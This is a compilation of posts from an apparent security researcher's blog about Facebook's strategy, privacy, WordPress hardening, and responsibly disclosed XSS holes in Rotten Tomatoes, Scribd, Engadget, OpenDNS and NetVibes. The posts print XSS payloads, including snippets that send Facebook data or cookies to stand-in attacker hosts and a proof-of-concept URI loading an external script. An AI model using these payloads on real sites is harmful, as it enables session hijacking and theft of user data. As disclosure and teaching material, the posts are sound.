Looking at Facebook’s Strategy and Possible New Directions

Over the last few months, Facebook has rolled out several significant new features, such as Places and the updated Groups. On Monday, Facebook is holding another event to announce what many expect to be an improved messaging feature. As I’ve watched these changes, I’ve been thinking about where Facebook might be headed.

At first, I started to think Facebook was simply looking to extend its reach by acting as an invisible layer of sorts. Anil Dash once talked about Facebook melting into the larger Web, and perhaps Facebook would end up becoming part of the underlying fabric of the Internet. In past public appearances, Facebook CEO Mark Zuckerberg seemed to be the kind of person who was content to remain in the background, and the company’s strategy seemed to reflect a similar style. I’ve mentioned before the idea of Facebook becoming an identity layer on the Internet, and innovations such as the Graph API have made it easier than ever for sites to integrate with Facebook.

But Facebook’s updated Groups feature changed my perspective, since it added functionality that would drive users back to facebook.com. Granted, the upgrade did enable e-mail as a way of interacting with groups without visiting the site. In some ways, Facebook’s overall strategy could be compared to Google’s. Years ago, many sites focused on “stickiness,” trying to keep users hooked. By contrast, Google drove users away by providing relevant links to other sites. But to see Google as non-sticky would be an oversimplification. In fact, the company built a successful ad network that extended its reach across the web. Also, Google has created a number of other products that many people stay logged into, such as Gmail.

And now, people are expecting Facebook to announce a web-based e-mail client that will compete with Gmail. I’m predicting that Facebook will roll out a new messaging system, but it won’t be a Gmail clone or simply another client for managing traditional POP/IMAP e-mail. That’s not to say there won’t be any e-mail gateway, but I think Facebook’s plans will go much further. I’m guessing that at least part of the new system will involve somehow extending private messaging features across Facebook-integrated websites.

In any event, I think Facebook’s announcement will include at least a few surprises for those who have been discussing the possibilities. Facebook has a history of introducing features that aren’t quite what people expected – features that often end up leading to practical implementations of ideas that were previously niche experiments. Personally, I think it’s a bit short-sighted to think that Facebook would simply join the market for web-based e-mail without trying to reinvent it, especially given how cautious the service has been about past features that enabled, or could have enabled, spam-like behavior.

Facebook has also been accused many times of somehow standing in opposition to “openness.” Personally, I think the term has become a buzzword that’s often used without much specificity. And even though I’ve often been a critic of Facebook, I do think many of the accusations aren’t entirely fair. From RSS feeds to developer APIs, Facebook has opened up data in ways that many other sites can’t claim. Today’s Facebook is certainly far more “open” than it was years ago – in fact, I would argue that the site has at times been too open lately, such as when some user data became reclassified as “publicly available” last fall. But regardless of Facebook’s degree of openness, the company has always been careful to maintain a high degree of control over information and features on the site. This can be positive, such as quickly removing malware links, or negative, such as controversial decisions to bar users or certain content.

Either way, that control has helped the site build a powerful database of profiles that generally reflects real people and real relationships. That’s part of what fascinated me about the site’s recent spat with Google over contact information. In the past, a list of e-mail addresses was about the only semi-reliable way to identify a group of people across the Internet. Now, many sites rely on Facebook’s social graph for that function. In terms of identity, the value of e-mail addresses has declined, and I don’t think exporting them from Facebook would provide as much value as Google might think. On the other hand, Google may realize this and be so concerned about the shift that they’re trying to curb Facebook’s influence. This would especially make sense if Google intends to introduce a more comprehensive social networking product that would need e-mail addresses as a starting point. Regardless, I’m sure Google feels threatened by the prospect of Facebook providing a better alternative to traditional e-mail – a change that would only bolster the value of a Facebook profile as the primary way to identify a typical Internet user.

Instant Personalization Program Gets New Partner, Security Issue

Facebook announced last week that movie information site Rotten Tomatoes would join Docs.com, Pandora, and Yelp as a partner in the social networking service’s “instant personalization” program. Rotten Tomatoes will now be able to automatically identify and access public information for visitors logged in to Facebook, unless those users have opted out of the program. This marks the first new partner since Facebook launched the feature earlier this year.

Soon after that initial roll-out, security researchers noted vulnerabilities on Yelp’s website that allowed an attacker to craft pages which would hijack Yelp’s credentials and gain the same level of access to user data. TechCrunch writer Jason Kincaid reported on the cross-site scripting (XSS) holes, and made this prediction: “I suspect we’ll see similar exploits on Facebook partner sites in the future.”

Kincaid’s suspicions have now been confirmed: the latest site with instant personalization also had an exploitable XSS vulnerability, which has since been patched. I’ll quickly add that Flixster, the company behind Rotten Tomatoes, has always been very responsive when I’ve contacted them about security issues. They have assured me that they have done XSS testing and prevention, which is more than could be said for many web developers. In posting about this issue, I primarily want to illustrate a larger point about web security.

When I heard about the expansion of instant personalization, I took a look at Rotten Tomatoes to see if any XSS problems might arise. I found one report of an old hole, but it appeared to be patched. After browsing around for a bit, though, I discovered a way I could insert some text into certain pages. At first it appeared that the site properly escaped any characters which could lead to an exploit. But ironically enough, certain unfiltered characters affected a third-party script used by the site in such a way that one could then execute arbitrary scripts. Since I had not seen this hole documented anywhere, I reported it to Rotten Tomatoes, and they promptly worked to fix it.
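
To illustrate the general pattern without reproducing the actual Rotten Tomatoes code, consider a hypothetical page that escapes HTML in its body but echoes a raw query parameter into an inline script variable read by a third-party script. Every name and URL below is made up:

    <!-- Hypothetical template: the site escapes HTML in the page body,
         but echoes the raw query into a script variable that a
         third-party script reads. -->
    <script>
      var searchTerm = "USER_INPUT"; /* server inserts the query here */
    </script>
    <script src="http://stats.example.com/track.js"></script>

    <!-- A request like ?q=";alert(document.cookie);// then yields: -->
    <script>
      var searchTerm = "";alert(document.cookie);//";
    </script>

The details of the real issue differed, but the lesson holds: escaping rules depend on context, and a third-party script can introduce contexts that a site’s own filters never considered.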

I’ve long argued that as more sites integrate with Facebook in more ways, we’ll see this type of problem become more common. Vulnerable applications built on the Facebook Platform provided new avenues for accessing and hijacking user accounts; now external websites that connect to Facebook open more possible security issues. As Kincaid noted in May, “Given how common XSS vulnerabilities are, if Facebook expands the program we can likely expect similar exploits. It’s also worth pointing out that some large sites with many Facebook Connect users – like Farmville.com or CNN – could also be susceptible to similar security problems. In short, the system just isn’t very secure.”

Overcoming such weaknesses is not a trivial matter, though, especially given the current architecture of how scripts are handled in a web page. Currently, any included script has essentially the same level of access and control as any other script on the page, including malicious code injected via an XSS vulnerability. If a site uses instant personalization, injected scripts can access the data used by Facebook’s code to enable social features. That’s not Facebook’s fault, and it would be difficult to avoid in any single sign-on infrastructure.
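
As a minimal sketch of what that means in practice, suppose a partner page has already initialized Facebook’s JavaScript SDK for a connected visitor. Injected code can simply piggyback on the page’s own objects (the attacker URL is hypothetical):

    // Hypothetical XSS payload on an instant personalization partner site.
    // Injected code runs with the same privileges as the page's own
    // scripts, so it can reuse whatever the page has already set up.
    if (window.FB) {
      // The same kind of call the site itself might make to personalize.
      FB.api('/me', function (response) {
        // Quietly ship the data to an attacker-controlled server.
        new Image().src = 'http://evil.example/log?u=' +
            encodeURIComponent(JSON.stringify(response));
      });
    }

No browser mechanism distinguishes this script from the legitimate ones, which is exactly the limitation of the page model described above.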

Of course, all of this applies to scripts intentionally included in the page as well, such as ad networks. With the Rotten Tomatoes roll-out, Facebook made clear that “User data is never transferred to ad networks.” Also, “Partner sites follow clear product/security/privacy guidelines,” and I assume Facebook is monitoring their usage. I’m not disputing any of these claims – Facebook is quite correct that advertisers are not getting user data.

But that’s due to policy limitations, not technical restrictions. Rotten Tomatoes includes a number of scripts from external sources for displaying ads or providing various functions. Any of these scripts could theoretically access a Facebook user’s information, though any script caught doing so would almost certainly be removed in short order. I did find it interesting that an external link-sharing widget on the site builds an array of links on the page, including the link to a user’s Facebook profile. This happens client-side, though, and the data is never actually transferred to another server.
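
In rough terms, the widget behaves something like this simplified sketch (not the vendor’s actual code); the commented-out line is the hypothetical step that policy, rather than technology, prevents:

    // Simplified sketch of a client-side link-collecting widget.
    var links = [];
    var anchors = document.getElementsByTagName('a');
    for (var i = 0; i < anchors.length; i++) {
      links.push(anchors[i].href); // may include a Facebook profile link
    }
    // Nothing technical stops a script from adding one more line:
    // new Image().src = 'http://tracker.example/collect?l=' +
    //     encodeURIComponent(links.join('|'));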

I bring up these aspects simply to note the technical challenges involved in this sort of federated system. I think it’s very possible that we will eventually see ad network code on a Facebook-integrated site that tries to load available user data. After all, I’ve observed that behavior in many Facebook applications over the last few years – even after Facebook issued explicit policies against such hijacking.

These dangers are part of the reason why JavaScript guru Douglas Crockford has declared security to be the number one problem with the World Wide Web today. Crockford has even advocated that we halt HTML5 development and focus on improving security in the browser first. While that won’t likely happen, I think Crockford’s concerns are justified and that many web developers have yet to realize how dangerous cross-site scripting can be. Perhaps these issues with instant personalization sites will help increase awareness and understanding of the threat.

Postscript: This morning, an XSS vulnerability on Twitter led to script-based worms (somewhat reminiscent of “samy is my hero”) and general havoc across the site. This particular incident was not related to any mashups, but once again emphasizes the real-world security ramifications of cross-site scripting in a world of mainstream web applications.

Update (Sep. 27): Today news broke that Scribd had also become part of Facebook’s Instant Personalization program. I took a look at the site and discovered within minutes that it had a quite trivial XSS vulnerability. This particular issue should have been obvious given even a basic understanding of application security. It also indicates that Facebook is not doing much to evaluate the security of new instant personalization partners. Update 2: Scribd patched the most obvious XSS issue right about the time I updated this post: entering HTML into the search box brought up a page that loaded it unfiltered. Another search issue remained, however: starting with a closing script tag would still affect code later in the results page. After about half an hour, that problem was also patched. I’m glad Scribd moved so quickly to fix these problems, but I still find it disconcerting that they were there to start with. I’ve not done any further checking for other XSS issues.

Security Through Obscurity and Privacy in Practice

Yesterday, security researcher Ron Bowes published a 2.8GB database of information collected from public Facebook pages. These pages list all users whose privacy settings enable a public search listing for their profile. Bowes wrote a program to scan through the listings and save the first name, last name, and profile URI of each user (though only if their last name began with a Latin character). The database includes this data for about 171 million profiles.

On the one hand, I wasn’t entirely surprised by this news – it was only a matter of time before someone started building up such a dataset. I’ve previously mentioned that developer Pete Warden had planned on releasing public profile information for 210 million Facebook users until the company’s legal team stepped in. But nothing technical prevented someone else from attempting the task and posting data without notice. I imagine Facebook may not be too happy with Bowes’ data, but I’m not going to delve into the legal issues surrounding page scraping.

However, the event did remind me of a related issue I’ve pondered over the last few months: the notion of “security through obscurity” as it relates to privacy issues.

I’ve often referenced the work of danah boyd, a social media researcher whom I highly respect. In a talk earlier this year at WWW2010 entitled “Privacy and Publicity in the Context of Big Data,” she outlined several excellent considerations on handling massive collections of data about people. One in particular is worth remembering in the context of public Facebook information: “Just because data is accessible doesn’t mean that using it is ethical.” Michael Zimmer at the University of Wisconsin-Milwaukee has made similar arguments, noting that mass harvesting of Facebook data goes against the expectations of users who maintain a public profile for discovery by friends, among other issues. Knowing some of the historical issues with academic research involving human subjects, I tend to agree with these positions.

But a related point from boyd’s talk concerns me from a security perspective: “Security Through Obscurity Is a Reasonable Strategy.” As an example, she notes that people talking in public settings may still discuss personal matters, but they rely on being one conversation among hundreds to maintain privacy. If people knew other people were specifically listening to their conversation, they would adjust the topic accordingly.

In this “offline” example, taking advantage of obscurity makes sense. But boyd applies the same idea online: “You may think that they shouldn’t rely on being obscure, but asking everyone to be paranoid about everyone else in the world is a very very very unhealthy thing…. You may be able to stare at everyone who walks by but you don’t. And in doing so, you allow people to maintain obscurity. What makes the Internet so different? Why is it OK to demand the social right to stare at everyone just because you can?”

I would respond that at least three aspects make the Internet different. First, you rarely have any way of knowing if someone is “staring at you” online. Public content on Facebook gets transferred to search engines, application developers, and individual web surfers every day without any notification to the creators of that content. Proxies and anonymizers can spoof or remove information that might otherwise help identify the source of a request. And as computing power increases each day, tracking down publicly accessible resources becomes ever easier.

Second, the nature of online data means that recording, parsing, and redistributing it tends to be far simpler than in the offline world. If I want to record someone’s in-person conversations, it’s theoretically possible that I could acquire a small recording device, place it in a convenient location, save the audio from it, type up a transcript of the person’s words, then send it to another person to read. But if I want to record someone’s conversations on Twitter (as an example), I can have all of them in a format understandable to various computer-based analysis tools in just a few clicks. In fact, I could set up an automated system which monitors the person’s Twitter account and updates me whenever certain words of interest appear. Add the fact that this is true of any public Twitter account, and the capabilities for online monitoring grow enormously.
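
To make that concrete, here is a rough sketch of such a monitor written for Node.js. It assumes Twitter’s unauthenticated v1 timeline endpoint as it works at the time of writing, and the screen name and watch words are placeholders:

    // Rough sketch: poll a public Twitter timeline and flag watch words.
    var http = require('http');

    var WATCH_WORDS = ['vacation', 'moving']; // placeholder words of interest

    function checkTimeline(screenName) {
      http.get({
        host: 'api.twitter.com',
        path: '/1/statuses/user_timeline.json?screen_name=' + screenName
      }, function (res) {
        var body = '';
        res.on('data', function (chunk) { body += chunk; });
        res.on('end', function () {
          JSON.parse(body).forEach(function (tweet) {
            WATCH_WORDS.forEach(function (word) {
              if (tweet.text.toLowerCase().indexOf(word) !== -1) {
                console.log('Match on "' + word + '": ' + tweet.text);
              }
            });
          });
        });
      });
    }

    // Check every five minutes, indefinitely.
    setInterval(function () { checkTimeline('someuser'); }, 5 * 60 * 1000);

Nothing in the offline world offers comparable shadowing at this cost: a few dozen lines, running unattended, applicable to every public account at once.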

Finally, while digital content is in some ways more ephemeral than other media, web data tends to persist well beyond a creator’s ability to control. Search engine caches, archival sites, and user redistribution all contribute to keeping content alive. If someone records a spoken conversation on a tape, the tape can be destroyed before copies are made. But if you (or a friend of yours) post a sentence or photo on a social networking site, you may never be able to erase it fully from the Internet. Several celebrities have learned this the hard way lately.

From a privacy perspective, I wholeheartedly agree with boyd that we can’t expect users to become paranoid sysadmins. The final point of my own guide to Facebook privacy admonished, “You Have to Live Your Life.” But from a security perspective, I know that there will always be people and automated systems which are “staring at you” on the Internet. I’ve seen time and again that if data is placed where others can access it online, someone will access it – perhaps even unintentionally (Google indexes many pages that were obviously not meant for public consumption).

In my opinion, the only way to offer any setup online which resembles the sort of “private in public” context boyd described requires some sort of a walled garden, such as limiting your Facebook profile to logged in users. That alone still doesn’t provide the same degree of privacy, since many fake profiles exist and applications may still have access to your data. But while “security through obscurity” (or perhaps more accurately, privacy through obscurity) may be a decent strategy in many “offline” social situations, it simply can’t be relied on to protect users and data online.

Facebook users are starting to discover this firsthand. I’ve seen several reactions to Bowes’ release that characterize it as a security issue or privacy issue, and people have seemed quite surprised that building such a dataset was even possible. Yet it really shouldn’t come as a surprise to someone familiar with current technology and ways of accessing Facebook data. And it won’t be the last time we see someone make use of “public” data in surprising ways. Some of these uses may be unfortunate or unethical (see above), but we’ve often seen technology steam ahead in pursuit of fortune, and the web has many users with differing ideas on ethics. Reversing the effects of such actions may prove impossible, which is why I would argue we need to prevent them by not trusting obscurity for protection. And how do we balance this perspective to avoid unhealthy paranoia? I’m honestly not sure – but if content is publicly accessible online without any technical limitations, we can hardly consider it immune to being publicized.

Secure Your WordPress By Learning From My Mistakes

Several weeks ago, I managed to create a small ruckus on Twitter by issuing a warning about a possible WordPress vulnerability. I was rather embarrassed to eventually discover that the actual problem related to a backdoor still on my server from a previous hack. This was not my first lesson in WordPress security, but it was certainly a memorable one.

I first created this blog in 2007 after finding basic CSRF issues in the first publicly available OpenSocial application. At the time, I admittedly knew very little about application security (not that I know much now!), but I was interested in many aspects of building online social networking systems, and that led me to research security issues more and more. Over time, this blog grew and several other projects hosted on the same server fell by the wayside. As my understanding of security also grew, I found some of my sites hacked a few times, and I undertook a number of steps to secure this WordPress installation.

That maintenance contributed to the confidence I had in my warning on Twitter – malicious scripts kept popping up in my site’s footer, and the only apparent lead was some suspicious requests to a particular WordPress interface. I had gone through all my plug-ins (the apparent source of previous attacks), double-checked my permissions, changed passwords, etc. I finally did a thorough sweep of every single folder on my site, and lurking in an upload folder, I found a sophisticated PHP backdoor.

I’m guessing that file had originally been placed during a much older attack and I’d simply missed it until now. Since deleting it and taking even more steps to protect my blog, I’ve not had any more trouble. I wouldn’t presume to think this site is 100% secure, and I’ve never claimed to be an expert on application security, much less WordPress or PHP security, but I’m now quite confident that I’ve taken enough precautions to avoid most attacks.

That leads me to the following list of steps I’ve performed to harden this particular WordPress site. If you’ve not taken the time to ensure your blog is secure, this may be a good guide for you to start with. I’m indebted to many websites on WordPress security, and while I would like to link to all of them, I’m honestly not sure which specific ones I’ve drawn from, and it would take a while to piece them together. A quick search will bring up many helpful recommendations, and I encourage you to check them out in addition to these tips.

  • Stay updated. Running the most current version of WordPress is probably the most important step. My host offers automatic updating for my installations. Also, be sure to keep your plug-ins updated as well.
  • Protect other sites. If you have more than one website running on the same server, make sure all of them are secure. One vulnerable application can compromise others. If you have sites that you don’t maintain, consider deleting them or locking them down to avoid future problems.
  • Scan through all of your folders. If you haven’t done this in a while, now would be a good time. Look through what files are present and keep an eye out for anything suspicious. Check your WordPress files against a fresh download to make sure they line up.
  • Scan through all of your permissions. This should be fairly easy with an FTP program that displays permissions settings. With rare exception, I keep files at chmod 644 and folders at chmod 755.
  • Periodically change passwords. Definitely modify your passwords if you’ve recovered from an attack. Remember to change your database password (and corresponding line in wp-config.php) as well as account passwords.
  • Use modified passphrases. This is one tip I don’t see often, but it’s one of my favorite tricks. Rather than simply jumbling characters into a password you have trouble remembering, start with a sentence. Not something terribly common, but something familiar to you. Pick one with at least six words in it. Take the whole sentence, with capitalization and punctuation, and add some complexity – append some numbers and punctuation at the beginning or end, and maybe change a few letters to numbers (such as “3” for “e”). For instance, the (purely illustrative) sentence “My neighbor’s beagle howls at every red car.” might become “42!My n3ighbor’s beagle howls at every red car.” You should then have a very strong “password” that’s much easier to remember. Many websites and applications will let you use spaces and hundreds of characters in your password. But once again: avoid common phrases, include at least six words, and don’t just use a sentence without adding some numbers and special characters.
  • Check your users table in the database. I’ve seen attacks before that led to the creation of an administrative account which is then hidden from the list of users in the web-based control panel. I’ve never quite understood why hidden users should be allowed, but that could be part of the attack to begin with. Anyway, just to be careful, I like to look at the actual table in the database and see if any other accounts have administrative privileges.
  • Double-check and clean up all plug-ins. I’ve deleted every plug-in I don’t use, and I try to keep all of my active plug-ins current. If you have a plug-in that’s no longer maintained or hasn’t been updated in a long time, you should probably check and see if a newer replacement is available. In my experience, plug-ins can be one of the weakest points in your WordPress installation. It’s kind of like a certain other site I know well – Facebook itself tends to be pretty secure, but you can often access data through vulnerable Facebook applications.
  • Add HTTP authentication to your wp-admin folder. This is covered in many places online so I’ll not recap specific steps here. And I’ll add that I realize this is not a silver bullet – basic authentication sends passwords in cleartext (so don’t use the same credentials as your WordPress account), and the traffic is not encrypted if you’re not using SSL/TLS. But adding another login prompt for the admin panel adds friction and may repel less-determined attackers. (This tip is obviously geared towards those who don’t have user accounts for non-admins.)
  • Move wp-config.php to a folder not as easily accessible. You can place wp-config.php one folder above your WordPress install; under my hosting setup, this location does not correspond to any public website folder. I also set mine to chmod 644 after changing it.
  • Rename your admin account. Several means exist to do this; I simply edited the record in the database.
  • Change your table prefix. This can be a bit of a hassle, but plug-ins exist (see below) to help. I’ll admit that I still need to check this one off my own list; long story.
  • Disable interfaces such as XML-RPC if you don’t use them. I don’t doubt that the programmers behind WordPress have worked hard to secure these interfaces, but I simply don’t like having another avenue of accessing administrative functions. And I think it’s not a bad idea to disable features you don’t actually need.
  • Use security tools. I installed the WP Security Scan plug-in after reading about it on WordPress’ own hardening guide.
  • Keep monitoring your site. I make a habit of loading up my homepage every so often, hitting “View Source,” and scanning through the HTML. If I ever see an unfamiliar script or iframe element, I look closer. (For one way to automate this check, see the sketch after this list.)
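
As promised in the last tip, here is a rough sketch of automating that source check with Node.js. The hostnames are placeholders; build the whitelist from the script and iframe sources your site legitimately uses:

    // Sketch: fetch the homepage and flag script/iframe sources
    // that fall outside a whitelist of expected hosts.
    var http = require('http');

    var ALLOWED = ['example.com', 'ajax.googleapis.com']; // placeholders

    http.get({ host: 'example.com', path: '/' }, function (res) {
      var html = '';
      res.on('data', function (chunk) { html += chunk; });
      res.on('end', function () {
        var pattern = /<(script|iframe)[^>]*src=["']([^"']+)["']/gi;
        var match;
        while ((match = pattern.exec(html)) !== null) {
          var src = match[2];
          var known = ALLOWED.some(function (host) {
            return src.indexOf(host) !== -1;
          });
          if (!known) {
            console.log('Unfamiliar ' + match[1] + ' source: ' + src);
          }
        }
      });
    });

A regex will not catch every injection technique (inline scripts, for one), so treat this as a tripwire rather than a substitute for manual review.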

That’s my personal list of WordPress security tips, based on many helpful resources and my own experiences of getting hacked. These certainly don’t apply to everyone, more could be added, and your mileage may vary, but hopefully this will help others avoid some of the problems I encountered. Be sure to look at other people’s advice as well and watch out for any WordPress security news.

XSS in Engadget’s New Site

I’m noticing a trend of sites patching the more obvious cross-site scripting vectors, such as search fields, but ignoring parameters in secondary pages, such as Ajax interfaces. Several applications in the Month of Facebook Bugs had pages for making Ajax calls or loading advertisements that were never meant to be loaded directly, yet doing so opened the door to XSS attacks. Keep in mind that any page on a given domain can access that domain’s cookies.

Yet another case in point came to my attention this week. I noticed that the technology news site Engadget had launched a redesign, and I began poking around the new site. After a little while, I came across four XSS vulnerabilities, all on the main www.engadget.com domain. I promptly reported the holes, and they were silently patched within a day or two. Since they’ve all been fixed, I’ll list the example URIs I sent here for the record:

  • http://www.engadget.com/?a=ajax-comment-vote&commentid=%3Cscript%3Ealert(document.cookie)%3C/script%3E
  • http://www.engadget.com/?a=ajax-comment-show-replies&commentid=%3Cscript%3Ealert(document.cookie)%3C/script%3E
  • http://www.engadget.com/?a=ajax-comment-report&commentid=%3Cscript%3Ealert(document.cookie)%3C/script%3E
  • http://www.engadget.com/mm_track/Engadget/media/?title=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Previously, each one of these pages loaded the inserted script, which brought up an alert dialog containing the user’s cookies for Engadget. Kudos to the team behind Engadget for the quick fixes, and hopefully this will serve as another reminder to all developers to leave no page unchecked when evaluating security issues.
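
One note on those alert(document.cookie) payloads: they are only proofs of concept. A real attacker would swap the alert for something silent, along the lines of this sketch (the attacker domain is hypothetical):

    // What a weaponized payload might do instead of popping an alert:
    // quietly ship the victim's cookies to an attacker's server.
    new Image().src = 'http://attacker.example/steal?c=' +
        encodeURIComponent(document.cookie);

Session cookies captured this way are often all an attacker needs to impersonate the victim on the vulnerable site.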


Real-Life Examples of Cross-Subdomain Issues

About two weeks ago, security researcher Mike Bailey posted a paper on cookie attacks via subdomains (hat tip: Jeremiah Grossman). I’ve seen several stories since then dealing with various subdomain security issues. In fact, the day after Bailey’s write-up, Yvo Schaap described several cases where Facebook and MySpace inadvertently exposed data through trust policies on particular subdomains.

I bring up subdomains to highlight two important considerations for developers. First, never ignore code hosted on subdomains. Your primary site may be secure, but vulnerabilities on one of your subdomains could still open you up to attacks. Second, make sure you understand how browsers handle subdomains. While subdomains are generally treated as separate from their parent domain, remember that changing document.domain can allow code to move up the DNS chain.
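
That second point deserves spelling out, since the mechanics surprise many developers. A minimal sketch, using hypothetical hosts:

    // On a page served from widgets.example.com:
    document.domain = 'example.com';

    // If a page from example.com (or another subdomain) sets the same
    // value, the two documents are treated as same-origin: each can walk
    // the other's DOM, call its functions, and read its document.cookie.
    // The value can only be relaxed upward within the page's own parent
    // domain, never to an unrelated domain. But as the NetVibes example
    // below shows, moving upward is often enough.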

While Schaap illustrated the first point already, I can add one more example. A few weeks ago, I poked around a few OpenDNS pages and noticed an oversight similar to some of the FAXX hacks I’d seen in September: an AJAX interface called directly rendered a good bit of HTML. While the output was mostly filtered, I did come across one parameter that could be used to render injected code. The vulnerable page was hosted on guide.opendns.com, a subdomain used for presenting search results: http://guide.opendns.com/ajax_serp.php?q=&oq=><script src%3Dhttp://theharmonyguy.com/opendns.js></script>

OpenDNS patched this hole quickly after I disclosed it to them, and I doubt it would have had much serious impact. Any important cookies appear to be attached to www.opendns.com, which would not be accessible, and changing network properties would require accessing OpenDNS pages over HTTPS, which the browser treats as a separate origin from the vulnerable HTTP page.

I came across a striking example of my second point while reading about a new Twitter widget. A ReadWriteWeb reader commented that users of NetVibes, a custom home page service, could make use of the widgets by inserting them into an HTML widget available on NetVibes. I knew that the Twitter widgets required JavaScript, so I started testing NetVibes widgets in much the same way I looked at Google Wave gadgets.

Sure enough, NetVibes allowed JavaScript and iframes to be inserted into their widgets, though these again render in container iframes. More troublesome, though, is that the container iframes do not load in an entirely separate domain – they load in a subdomain of netvibes.com. Within minutes, I changed document.domain to netvibes.com and loaded the cookies associated with that domain. Thankfully, my login cookies appear to be tied only to www.netvibes.com, and attempts to load pages using URIs that don’t include “www” get forwarded to www.netvibes.com pages. Still, as much as I’ve criticized Google Wave’s gadget implementation, at least Google used a domain entirely separate from google.com for its gadgets. Finally, I would note that I could add potentially malicious NetVibes widgets to publicly accessible NetVibes pages, leading to persistent XSS issues.

As Bailey pointed out in his paper, “DNS was never intended to be a security feature.” Even with protections such as same-origin policies, I get a bit leery at times at how thin the walls preventing certain attacks can become. When building secure web applications, remember your subdomains and how they relate to each other.
